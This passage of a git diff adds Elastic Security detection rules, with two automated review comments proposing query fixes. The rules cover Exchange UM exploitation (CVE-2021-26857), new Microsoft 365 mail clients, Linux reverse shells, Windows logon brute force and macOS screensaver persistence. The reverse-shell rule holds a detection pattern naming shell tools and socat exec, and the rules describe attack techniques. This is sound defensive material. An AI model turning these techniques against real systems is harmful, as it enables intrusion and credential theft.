@@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies suspicious processes being spawned by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26857.", + "false_positives": [ + "Legitimate processes may be spawned from the Microsoft Exchange Server Unified Messaging (UM) service. If known processes are causing false positives, they can be exempted from the rule." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Exchange Server UM Spawning Suspicious Processes", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"UMService.exe\", \"UMWorkerProcess.exe\") and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\werfault.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V??\\\\Bin\\\\UMWorkerProcess.exe\",\n \"?:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\Bin\\\\UMWorkerProcess.exe\",\n \"D:\\\\Exchange 2016\\\\Bin\\\\UMWorkerProcess.exe\",\n \"E:\\\\ExchangeServer\\\\Bin\\\\UMWorkerProcess.exe\",\n \"D:\\\\Exchange\\\\Bin\\\\UMWorkerProcess.exe\",\n \"D:\\\\Exchange Server\\\\Bin\\\\UMWorkerProcess.exe\",\n \"E:\\\\Exchange Server\\\\V15\\\\Bin\\\\UMWorkerProcess.exe\")\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, 
+ "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b_108", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_109.json b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_109.json new file mode 100644 index 00000000000..dfc199b2e6a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_109.json 
@@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies suspicious processes being spawned by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26857.", + "false_positives": [ + "Legitimate processes may be spawned from the Microsoft Exchange Server Unified Messaging (UM) service. If known processes are causing false positives, they can be exempted from the rule." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Exchange Server UM Spawning Suspicious Processes", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"UMService.exe\", \"UMWorkerProcess.exe\") and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\werfault.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V??\\\\Bin\\\\UMWorkerProcess.exe\",\n \"?:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\Bin\\\\UMWorkerProcess.exe\",\n \"D:\\\\Exchange 2016\\\\Bin\\\\UMWorkerProcess.exe\",\n \"E:\\\\ExchangeServer\\\\Bin\\\\UMWorkerProcess.exe\",\n \"D:\\\\Exchange\\\\Bin\\\\UMWorkerProcess.exe\",\n \"D:\\\\Exchange Server\\\\Bin\\\\UMWorkerProcess.exe\",\n \"E:\\\\Exchange Server\\\\V15\\\\Bin\\\\UMWorkerProcess.exe\")\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + 
"ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b_109", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_105.json b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_105.json new file mode 100644 index 00000000000..2478d969a2a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_105.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Microsoft 365 Mailbox is accessed by a ClientAppId that was observed for the fist time during the last 10 days.", + "false_positives": [ + "User using a new mail client." + ], + "from": "now-30m", + "history_window_start": "now-10d", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Microsoft 365 Mail Access by ClientAppId", + "new_terms_fields": [ + "o365.audit.ClientAppId", + "user.id" + ], + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:MailItemsAccessed and event.outcome:success\n", + "references": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-193a" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "48819484-9826-4083-9eba-1da74cd0eaf2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + 
"timestamp_override": "event.ingested", + "type": "new_terms", + "version": 105 + }, + "id": "48819484-9826-4083-9eba-1da74cd0eaf2_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_2.json b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_2.json new file mode 100644 index 00000000000..a8afcd5c5bc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_2.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Microsoft 365 Mailbox is accessed by a ClientAppId that was observed for the fist time during the last 10 days.", + "false_positives": [ + "User using a new mail client." + ], + "from": "now-30m", + "history_window_start": "now-10d", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Microsoft 365 Mail Access by ClientAppId", + "new_terms_fields": [ + "o365.audit.ClientAppId", + "user.id" + ], + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:MailItemsAccessed and event.outcome:success\n", + "references": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-193a" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "48819484-9826-4083-9eba-1da74cd0eaf2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + 
"timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "48819484-9826-4083-9eba-1da74cd0eaf2_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_4.json b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_4.json new file mode 100644 index 00000000000..5d6aeb11de5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_4.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Microsoft 365 Mailbox is accessed by a ClientAppId that was observed for the fist time during the last 10 days.", + "false_positives": [ + "User using a new mail client." + ], + "from": "now-30m", + "history_window_start": "now-10d", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Microsoft 365 Mail Access by ClientAppId", + "new_terms_fields": [ + "o365.audit.ClientAppId", + "user.id" + ], + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:MailItemsAccessed and event.outcome:success\n", + "references": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-193a" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "48819484-9826-4083-9eba-1da74cd0eaf2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + 
"timestamp_override": "event.ingested", + "type": "new_terms", + "version": 4 + }, + "id": "48819484-9826-4083-9eba-1da74cd0eaf2_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_8.json b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_8.json new file mode 100644 index 00000000000..a4336de5236 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_8.json 
@@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This activity consists of a parent-child relationship where a network event is followed by the creation of a shell process. An attacker may establish a Linux TCP reverse shell to gain remote access to a target system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell", + "query": "sequence by host.id with maxspan=5s\n [network where event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"socat\") and destination.ip != null and \n not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")] by process.entity_id\n [process where event.type == \"start\" and event.action in (\"exec\", \"fork\") and \n process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.args : (\"-i\", \"-l\")) or (process.parent.name == \"socat\" and process.parent.args : \"*exec*\")\n )] by process.parent.entity_id\n", + "references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "48b3d2e3-f4e8-41e6-95e6-9b2091228db3", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "type": "eql", + "version": 8 + }, + "id": "48b3d2e3-f4e8-41e6-95e6-9b2091228db3_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_9.json b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_9.json new file mode 100644 index 00000000000..71351da26d4 --- /dev/null 
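Review bot: The query in this hunk never constrains `host.os.type`, although the rule is tagged `OS: Linux`, its description speaks of a Linux reverse shell and its setup text is Linux-specific; `logs-endpoint.events.*` also carries macOS data, where every listed shell exists, so the sequence would fire there too. The sibling rules in this diff (`48d7f54d`, `48f657ee`) pin the platform inside the query, so adding `host.os.type == "linux" and` to both the `network where` and the `process where` stage (or widening the tags and description if macOS coverage is intended) would make the rule and its metadata agree. Separately, the setup text links `fleet/8.10/agent-policy.html` while the neighbouring rules link `fleet/current/agent-policy.html`.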
+++ b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_9.json 
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple consecutive logon failures from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Multiple Logon Failure from the same Source Address", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /*\n noisy failure status codes often associated to authentication misconfiguration :\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E\t- There are currently no logon servers available to service the logon request.\n 0XC0000133\t- Clocks between DC and other computer too far out of sync.\n 0XC0000192\tAn attempt was made to logon, but the Netlogon service was not started.\n */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=10\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4624", + "https://social.technet.microsoft.com/Forums/ie/en-US/c82ac4f3-a235-472c-9fd3-53aa646cfcfd/network-information-missing-in-event-id-4624?forum=winserversecurity", + "https://serverfault.com/questions/379092/remote-desktop-failed-logon-event-4625-not-logging-ip-address-on-2008-terminal-s/403638#403638" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + 
], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.Status", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "48b6edfc-079d-4907-b43c-baffa243270d", + "setup": "## Setup\n\n- In some cases the source network address in Windows events 4625/4624 is not populated due to Microsoft logging limitations (examples in the references links). This edge case will break the rule condition and it won't trigger an alert.\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 9 + }, + "id": "48b6edfc-079d-4907-b43c-baffa243270d_9", + "type": "security-rule" +} \ No newline at end of file 
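Review bot: The status-code exclusion in the query mixes `0xC000015B` with `0XC000005E`, `0XC0000133` and `0XC0000192`; EQL's `:` operator is documented as case-insensitive so the match should still work, but a reader checking these literals against 4625 event data has to know that, and the `user.domain == "NT AUTHORITY"` clause just above uses case-sensitive `==` for a value from the same event, so the two look inconsistent. Normalising the hex literals to one casing, e.g. `"0xC000015B", "0xC000005E", "0xC0000133", "0xC0000192"`, and deciding deliberately between `==` and `:` for the domain check would remove the ambiguity. The inline comment `/* event 4625 need to be logged */` should read `/* event 4625 needs to be logged */`.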
diff --git a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_107.json b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_107.json new file mode 100644 index 00000000000..1d265d25b51 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_107.json 
@@ -0,0 +1,84 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a child process is spawned by the screensaver engine process, which is consistent with an attacker's malicious payload being executed after the screensaver activated on the endpoint. An adversary can maintain persistence on a macOS endpoint by creating a malicious screensaver (.saver) file and configuring the screensaver plist file to execute code each time the screensaver is activated.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unexpected Child Process of macOS Screensaver Engine", + "note": "## Triage and analysis\n\n- Analyze the descendant processes of the ScreenSaverEngine process for malicious code and suspicious behavior such\nas a download of a payload from a server.\n- Review the installed and activated screensaver on the host. Triage the screensaver (.saver) file that was triggered to\nidentify whether the file is malicious or not.\n", + "query": "process where host.os.type == \"macos\" and event.type == \"start\" and process.parent.name == \"ScreenSaverEngine\"\n", + "references": [ + "https://posts.specterops.io/saving-your-access-d562bf5bf90b", + "https://github.com/D00MFist/PersistentJXA" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + 